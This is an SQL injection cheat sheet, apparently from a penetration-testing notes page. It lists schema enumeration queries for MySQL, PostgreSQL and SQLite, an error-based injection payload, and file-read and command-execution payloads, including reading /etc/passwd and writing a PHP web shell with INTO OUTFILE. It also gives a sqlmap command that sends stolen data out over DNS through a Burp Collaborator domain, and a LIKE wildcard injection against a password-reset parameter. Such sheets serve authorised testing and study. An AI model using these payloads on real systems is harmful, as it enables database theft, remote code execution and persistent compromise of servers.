Skip to main content

SQL Injection

Database enumeration

MySQL

SELECT GROUP_CONCAT(schema_name,',') FROM information_schema.schemata;
SELECT GROUP_CONCAT(table_name,',') FROM information_schema.tables;
SELECT GROUP_CONCAT(column_name,',') FROM information_schema.columns WHERE table_name = 'users';

PostgreSQL

SELECT datname FROM pg_database;
SELECT string_agg(table_name,',') FROM information_schema.tables;
SELECT string_agg(column_name,',') FROM information_schema.columns WHERE table_name = 'users';

SQLite

SELECT GROUP_CONCAT(tbl_name,',') FROM sqlite_master WHERE type='table' AND tbl_name NOT like 'sqlite_%';
SELECT sql FROM sqlite_master WHERE tbl_name='users';
SELECT GROUP_CONCAT(name,',') FROM PRAGMA_TABLE_INFO('users');

Error based

PostgreSQL

' AND 1=CAST((SELECT username FROM users) AS int)--

File read/write & RCE

PostgreSQL

SELECT pg_ls_dir('.');
SELECT pg_read_file('/etc/passwd');
COPY (SELECT '') TO PROGRAM 'sleep 5';

MySQL

SELECT LOAD_FILE('/etc/passwd');
SELECT '<?php system($_REQUEST[c]); ?>' INTO OUTFILE '/var/www/html/shell.php';

Faster Exfiltration via DNS

  • https://github.com/PortSwigger/sqlmap-dns-collaborator
  • https://arxiv.org/ftp/arxiv/papers/1303/1303.3047.pdf

SqlmapDnsCollaborator is a Burp Extension that lets you perform DNS exfiltration with Sqlmap with zero configuration needed. You won't need a domain name or a public IP, just a computer with Sqlmap and Burp.

How you would normally perform DNS exfiltration with Sqlmap:

  1. You buy a domain name, a public IP and then you set up a server
  2. You run Sqlmap on that server, which performs some SQL injection on the vulnerable target.
  3. Vulnerable target sends DNS requests to your DNS server containing interesting data.
  4. DNS requests are interpreted by Sqlmap.

How you are going to perform DNS exfiltration with Sqlmap and SqlmapDnsCollaborator:

  1. You open Burp on your computer and enable SqlmapDnsCollaborator.
  2. You run Sqlmap on your computer, which performs some SQL injection on the vulnerable target.
  3. Vulnerable target sends DNS requests to Burp Collaborator containing interesting data.
  4. SqlmapDnsCollaborator reads DNS requests from Burp Collaborator and sends them to Sqlmap.
  5. DNS requests are interpreted by Sqlmap.
sqlmap.py -r req.txt --dns-domain=yourcollab.burpcollaborator.net -v3 

SQL "LIKE" Wildcard Injection

This vulnerability, often overlooked and considered low risk, can have significant impacts in certain scenarios. It involves injecting a wildcard in the search field of a LIKE clause in a SQL statement.

Types of Wildcards

  • %: Equivalent to any string of zero or more characters.
  • _: Equivalent to any single character.

Vulnerability

An application becomes vulnerable when it uses the LIKE operator with a user-received parameter without filtering these wildcards. For example:

SELECT text FROM table WHERE secrets LIKE '$secret'

Even if the $secret parameter is sanitized to prevent SQL injection, wildcards can still be injected: http://www.vulnerable.com/reset.php?secret=<guessed_chars>_____________

"_" are the chars that match the wildcard

Sources